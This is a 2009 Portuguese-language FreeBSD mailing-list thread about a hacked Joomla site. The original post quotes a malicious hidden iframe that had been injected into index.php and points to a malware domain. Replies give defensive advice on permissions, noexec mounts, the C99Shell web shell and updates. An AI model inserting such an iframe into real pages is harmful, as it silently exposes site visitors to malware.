[FUG-BR] [off-topic] Index modificado

Nilton Jose Rizzo rizzo em i805.com.br
Terça Janeiro 13 18:41:09 BRST 2009 

On Tue, 13 Jan 2009 17:27:39 +0000, Marcello wrote
> O causa mais provavel devem ser o dono do arquivo e permissão de
> gravação , o log do apache pode te fornecer algumas dicas de quando isso
> ocorreu.
> 
> Verifique se dono do arquivo for  www:www , deixe root:www, mas o melhor
> seria um grupo joomla ou um usuario qualquer diferente do apache.
> 
> Colocar a pasta publica do apache em uma partição montada com noexec 
> e nosuid é um excelente modo de evitar supresas.
> 
> Agora isso é furo da aplicação , do joomla que permitiu o uso de 
> algum script .
> 
> Abraços

   Verifique se não houve a instalação de um aplicativo
   chamado C99Shell ou algo semelhante  ... é um aplicativa 
   em PHP que infelismente arromba o server, pos da para acessar todos os 
   conteúdos que houver permissão de leitura

   Infelismente tive essa desagradavel surpresa em meu servidor no meio do
   ano passado, e foi atraves de php injection (falha de segurança no 
   aplicativo) uma das soluções atodada foi colocar apenas os attrib 644 
   em todos os diretorios e sub-diretorios do /usr/local/www e a atualização
   das aplicações.

   A minha sorte foi que aparentemente foi um scriptkids que não sabia
   muito bem o que estava fazendo .... É terrível vc passar por uma 
   situação assim :(

   Se precisar de ajuda, peça.

> 
> Em Ter, 2009-01-13 às 14:21 -0400, Siclal Oliveira escreveu:
> > Olá lista
> > 
> > Esta é minha primeira participação na lista.
> > Já trabalho há algum tempo com Freebsd, de forma que espero poder
> > contribuir de alguma forma.
> > 
> > Bem, estou com um problema em um dos servidores que administro:
> > O servidor roda Freebsd 7.0 release Amd64, com as últimas versões do
> > php e do mysql atualizados.
> > Ocorre que o meu cliente usa Joomla e algumas das funções exigiram que
> > eu desabilitasse o safe mode do php.
> > A atualização do Joomla ficaria por conta dele, mas para a minha
> > surpresa, atualmente está utilizando a versão 1.0.15, quando a mais
> > atualizada seria a 1.5.9.
> > Fui chamado porque ao abrir a página era startado um direcionamento a
> > uma página com vírus.
> > Verificando o index, percebi que havia sido inserido um código
> > malicioso não última linha:
> > 
> > <html><body><iframe src="http://litedownloadseek.cn/in.cgi?cocacola8" width=1
> > height=1 style="visibility: hidden"></iframe></body></html>
> > 
> > Eu imagino que a insersão deva ter ocorrido a partir de alguma falha
> > do joomla, mas gostaria de saber como proceder com os logs a fim de
> > identificar este incidente.
> > Como eu poderia saber se o meu servidor foi afetado gravemente.
> > 
> > Desde já agradeço.
> > 
> > Abraços a todos.
> > 
> > Siclal
> > -------------------------
> > Histórico: http://www.fug.com.br/historico/html/freebsd/
> > Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
> 
> -------------------------
> Histórico: http://www.fug.com.br/historico/html/freebsd/
> Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd


-- 
Nilton José Rizzo 
805 Informatica 
Disseminando tecnologias 
021 2413 9786

Mais detalhes sobre a lista de discussão freebsd